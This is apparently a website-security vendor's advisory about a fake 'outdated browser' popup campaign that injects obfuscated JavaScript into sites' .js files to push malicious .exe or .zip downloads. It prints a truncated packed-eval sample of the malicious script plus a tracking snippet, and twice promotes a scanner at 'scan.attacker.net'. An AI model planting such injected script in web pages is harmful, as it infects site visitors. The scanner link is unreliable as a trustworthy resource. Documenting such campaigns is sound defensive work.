Thousands of websites infected by Fake Outdated Browser malware and popups

Our security scanners detected thousands of recently infected websites by this fake outdated browser update malware which shows a popup window asking the visitor to update their outdated browser by clicking on the “Update” button which is a link to malicious .exe or .zip files to infecte their computers.

The malware is targeting Firefox, chrome, IE and other browsers and it shows customized popup windows to match the browser you are using.

You can check your website security by using this free website malware scanner https://scan.attacker.net

The malware is usally injected into .js files, Here is an example of the malicious javascript malware:


<script type=”text/javascript“> eval(function(p,a,c,k,e,d){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k

REMOVED…

REMOVED…

REMOVED…

rm|ul|secure|setCookie|update_2019_02|lookupRedirect|saoverlay|inherit|1000|footer_button|setStr|weight|bShowPassed|Uint8Array|array|getCookie|none|modal_h|Update|subarray|35px|search|position|enc1|translate|filename|of|isIEponents|24px|0px|possible|outdated|this|sAdsUrl2|as|content|set_|15px|18px|flexbox|setTime|substring|items|opera|isChrome|init_Chrome|h1|isOpera|D1|td|init_Firefox|viettellamdong|jm|isFirefox|Opera|ActiveXObject|h2|init_Opera|init_Edge|business|label|h5|init_Safari|h4|XMLHTTP|isEdge|init_Android|Safari|attr|h3|init_IE|Chrome|marketing

REMOVED…

REMOVED…

REMOVED…

pssacS|Ci9PSpH|F5zqjAc|Firefox|firefox|sLqiUR0|Internet|forEach|call|querySelectorAll|default|switch|Explorer|ie|wicS3do|caption|baseline|due|version|table|soon|occurred|has|sBB68wf|Center|critical|The||following|personal|and|stored|Loss|versions|are|also|on|stream|octet|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|match|Za|Int32Array|Uint32Array|Array|byteLength|set|z0|||while|removeChild|revokeObjectURL|application|click|appendChild|Blob|createElement|createObjectURL|Confidential|your|small|strong|sub|samp|kbd|em|ins|sup|tt|fieldset|form|legend|ol|dd|dl|dt|dfn|strike|leak|blockquote|address|iframe|onclick|html|pre|applet|abbr|information|big|code|cite|h6|del’.split(‘|’),0,{})) </script> <script type=”text/javascript“>var _Hasync= _Hasync|| []; _Hasync.push([‘Histats.start’, ‘1,4214393,4,0,0,0,00010000’]); _Hasync.push([‘Histats.fasi’, ‘1’]); _Hasync.push([‘Histats.track_hits’, ”]); (function() { var hs = document.createElement(‘script’); hs.type = ‘text/javascript’; hs.async = true; hs.src = (‘//s10.histats.com/js15_as.js’); (document.getElementsByTagName(‘head’)[0] || document.getElementsByTagName(‘body’)[0]).appendChild(hs); })();</script> <noscript><a href=”/” target=”_blank”><img src=”//sstatic1.histats.com/0.gif?4214393&101″ alt=”counter customizable free hit” border=”0″></a></noscript> <script type=”text/javascript“> </script>

When viewed in a browser:

Signup and Try our malware removal service and let’s clean & protect your websites!

You can check your website securityby using this website malware scanner

https://scan.attacker.net